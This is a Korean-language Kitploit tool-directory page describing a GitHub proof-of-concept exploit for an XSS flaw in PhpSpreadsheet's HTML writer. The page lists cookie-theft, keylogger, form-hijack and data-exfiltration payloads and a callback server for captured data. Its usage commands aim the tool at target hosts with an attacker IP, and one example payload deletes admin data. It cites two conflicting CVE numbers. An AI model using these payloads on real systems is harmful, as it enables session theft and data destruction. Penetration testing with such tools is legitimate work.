Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-47875-PhpSpreadsheet-XSS-PoC — 이것은 CVE-2024-47875 PhpSpreadsheet XSS Vuln에 대한 PoC/Exploit입니다. | Kitploit
도구/GitHubGitHub/roj1py/cve-2024-47875-phpspreadsheet-xss-poc
Phishing ToolsPayload GenerationExploitationWeb Application ExploitationData ExfiltrationCommand and Control
GitHubroj1py/cve-2024-47875-phpspreadsheet-xss-poc

CVE-2024-47875-PhpSpreadsheet-XSS-PoC

이것은 CVE-2024-47875 PhpSpreadsheet XSS Vuln에 대한 PoC/Exploit입니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1131년 전아직 검토되지 않음

CVE-2025-22131 • PhpSpreadsheet HTML Writer XSS (PoC)

개요

이는 CVE-2025-22131에 대한 PoC입니다. PhpSpreadsheet 버전 2.2.2, 2.1.2, 1.29.4 이전 버전에서 발생하는 XSS(크로스 사이트 스크립팅) 취약점입니다. 이 취약점은 generateNavigation() 함수에 존재하며, XLSX를 HTML로 변환할 때 시트 이름을 살균 처리하지 않아 악성 JavaScript 주입이 가능합니다.

CVE ID: CVE-2024-47875

GitHub Advisory: GHSA-79xx-vf93-p7cx

영향받는 버전: PhpSpreadsheet < 2.2.2, < 2.1.2, < 1.29.4

작성자: Roj

라이선스: MIT

저장소: PoC Repo


기능

📄 사용자 정의 XSS 페이로드가 포함된 악성 XLSX 파일 생성

🛠️ 다양한 페이로드 유형 지원:

  • cookie_theft: 세션 쿠키 탈취
  • redirect: 사용자를 공격자가 제어하는 사이트로 리디렉션
  • alert: PoC용 테스트 알림 표시
  • keylogger: 키 입력 캡처
  • form_hijack: 폼 제출 가로채기
  • data_exfil: 지정된 엔드포인트에서 데이터 유출

🌐 익스플로잇 콜백을 캡처하는 내장 HTTP 서버

⬆️ 악성 XLSX 파일을 대상 엔드포인트에 업로드

💾 캡처된 데이터(예: 쿠키)를 JSON 파일로 저장

🎨 가독성을 높인 컬러 출력

🔍 디버깅을 위한 상세 로깅


사용법

python exploit.py -h

🚀 사용 예시:

# 기본 쿠키 탈취 공격
python3 exploit.py http://target.htb 10.10.16.50

# 사용자 정의 업로드 엔드포인트
python3 exploit.py http://app.htb 10.10.16.50 -e /api/file-upload

# 다른 페이로드 유형
python3 exploit.py http://target.com 10.10.16.50 -p keylogger
python3 exploit.py http://target.com 10.10.16.50 -p redirect
python3 exploit.py http://target.com 10.10.16.50 -p form_hijack

# 사용자 정의 XSS 페이로드
python3 exploit.py http://target.com 10.10.16.50 --custom "<script>fetch('/admin/delete-all')</script>"

피드백을 받고 싶습니다. 모두 행운을 빕니다.

도구 다운로드